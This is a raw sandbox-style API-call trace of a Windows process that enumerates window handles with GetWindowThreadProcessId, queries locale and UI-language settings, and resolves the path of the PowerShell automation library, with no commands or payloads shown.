	[0631.335] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b50
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14b4
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x149c
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14a8
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1490
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14a4
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x148c
	[0631.336] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1458
	[0631.336] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b4c
	[0631.336] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b3c
	[0634.051] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x19bc
	[0639.979] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x199c
	[0646.027] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1998
	[0646.027] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1994
	[0646.027] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1990
	[0646.027] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1984
	[0646.028] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x197c
	[0646.028] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1978
	[0646.028] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1824
	[0646.028] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1088
	[0650.290] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1908
	[0650.293] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18cc
	[0652.193] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18d0
	[0653.666] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1840
	[0653.666] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10c4
	[0653.667] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x128c
	[0653.667] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16e8
	[0653.667] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16cc
	[0653.667] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x274
	[0653.667] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10e0
	[0653.668] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10cc
	[0653.671] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10c0
	[0653.672] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10d0
	[0653.672] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1198
	[0653.673] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1080
	[0653.673] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1074
	[0653.673] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x106c
	[0653.674] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1474
	[0653.705] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1414
	[0653.706] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xbd0
	[0655.765] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x550
	[0658.044] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa38
	[0658.045] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16d0
	[0659.671] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16d4
	[0660.182] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x15bc
	[0661.647] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x15a0
	[0662.568] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x159c
	[0662.569] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1598
	[0666.420] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1594
	[0668.218] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1590
	[0668.714] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x158c
	[0670.571] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1588
	[0672.180] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1584
	[0672.807] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1580
	[0672.808] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x157c
	[0672.809] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1488
	[0676.342] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1404
	[0678.337] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x11b8
	[0679.137] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xbd4
	[0679.139] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe0c
	[0679.140] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd30
	[0681.147] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe70
	[0681.149] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x13b8
	[0681.150] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe20
	[0683.076] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe2c
	[0683.078] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe00
	[0687.606] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe04
	[0689.386] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc94
	[0690.154] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x13b0
	[0690.155] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x13ac
	[0690.156] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x13a8
	[0696.134] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1374
	[0696.134] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x132c
	[0696.134] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1328
	[0696.135] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12d0
	[0696.135] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12cc
	[0696.135] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12c8
	[0696.135] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1290
	[0696.135] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1218
	[0696.135] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1214
	[0696.135] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x11ec
	[0696.135] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x11e8
	[0696.136] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x11cc
	[0696.136] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1140
	[0696.136] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe6c
	[0696.136] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x6e8
	[0696.136] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc6c
	[0696.136] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf94
	[0696.136] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xffc
	[0696.136] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf74
	[0696.137] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf08
	[0696.137] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf0c
	[0696.137] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xed8
	[0696.137] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe90
	[0696.137] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xea8
	[0696.137] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfa8
	[0696.137] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfbc
	[0696.137] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfb8
	[0696.138] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfb4
	[0696.138] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfb0
	[0696.138] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfac
	[0696.138] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfc0
	[0696.138] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfd0
	[0696.138] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf88
	[0696.138] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf84
	[0696.138] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf80
	[0696.139] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xde0
	[0696.139] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xddc
	[0696.139] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdd8
	[0696.139] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd34
	[0696.139] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd10
	[0696.139] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd0c
	[0696.139] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc9c
	[0696.139] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc74
	[0696.140] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc1c
	[0696.140] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc08
	[0696.140] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xabc
	[0696.140] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x24c
	[0696.140] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xbb0
	[0696.140] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xbfc
	[0696.140] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb10
	[0696.140] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x374
	[0696.141] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x368
	[0696.141] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb28
	[0696.141] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xae8
	[0696.141] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb14
	[0696.141] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x95c
	[0696.141] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa8c
	[0696.141] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x46c
	[0696.141] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb3c
	[0696.142] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa90
	[0696.142] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xad0
	[0696.142] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa9c
	[0696.142] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xaa0
	[0696.142] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb1c
	[0696.142] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x7e0
	[0696.142] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa74
	[0696.142] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x694
	[0696.143] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa28
	[0696.143] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x9b0
	[0696.143] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x8d8
	[0696.143] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x940
	[0696.143] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x93c
	[0696.143] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4ec
	[0696.143] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x150
	[0696.143] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x720
	[0696.144] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x3c4
	[0696.144] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x7d4
	[0696.144] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x6c8
	[0696.144] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb54
	[0696.144] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb54
	[0696.144] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb5c
	[0696.144] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x838
	[0696.145] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x818
	[0696.145] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x5b8
	[0696.145] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x494
	[0696.145] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1ec
	[0696.145] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x440
	[0696.145] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x7e8
	[0696.145] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x730
	[0696.145] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x2c8
	[0696.146] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x31c
	[0696.146] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x330
	[0696.146] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x128
	[0696.146] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x5c8
	[0696.146] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x6f8
	[0696.146] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x358
	[0696.146] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x73c
	[0696.146] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb0
	[0696.147] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x250
	[0696.147] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x240
	[0696.147] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x790
	[0696.147] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x61c
	[0696.147] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x568
	[0696.147] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x538
	[0696.147] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x540
	[0696.147] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0696.148] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x79c
	[0696.148] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4e0
	[0696.148] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0696.148] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x778
	[0696.152] WerSetFlags () returned 0x0
	[0696.161] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0696.161] CoTaskMemFree (pv=0x0) 
	[0696.162] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e108, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e100 | out: pulNumLanguages=0x16e108, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e100) returned 1
	[0696.162] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e108, pwszLanguagesBuffer=0x2ba70a0, pcchLanguagesBuffer=0x16e100 | out: pulNumLanguages=0x16e108, pwszLanguagesBuffer=0x2ba70a0, pcchLanguagesBuffer=0x16e100) returned 1
	[0696.168] CoTaskMemAlloc (cb=0x24) returned 0x2a7a40
	[0696.168] GetUserDefaultLocaleName (in: lpLocaleName=0x2a7a40, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0696.168] CoTaskMemFree (pv=0x2a7a40) 
	[0701.518] CoTaskMemAlloc (cb=0x104) returned 0x1f3180
	[0701.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0701.518] CoTaskMemFree (pv=0x1f3180) 
	[0701.521] CoTaskMemAlloc (cb=0x104) returned 0x1f3180
	[0701.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0701.521] CoTaskMemFree (pv=0x1f3180) 
	[0701.523] CoTaskMemAlloc (cb=0x104) returned 0x1f3180
	[0701.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0701.523] CoTaskMemFree (pv=0x1f3180) 
	[0701.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
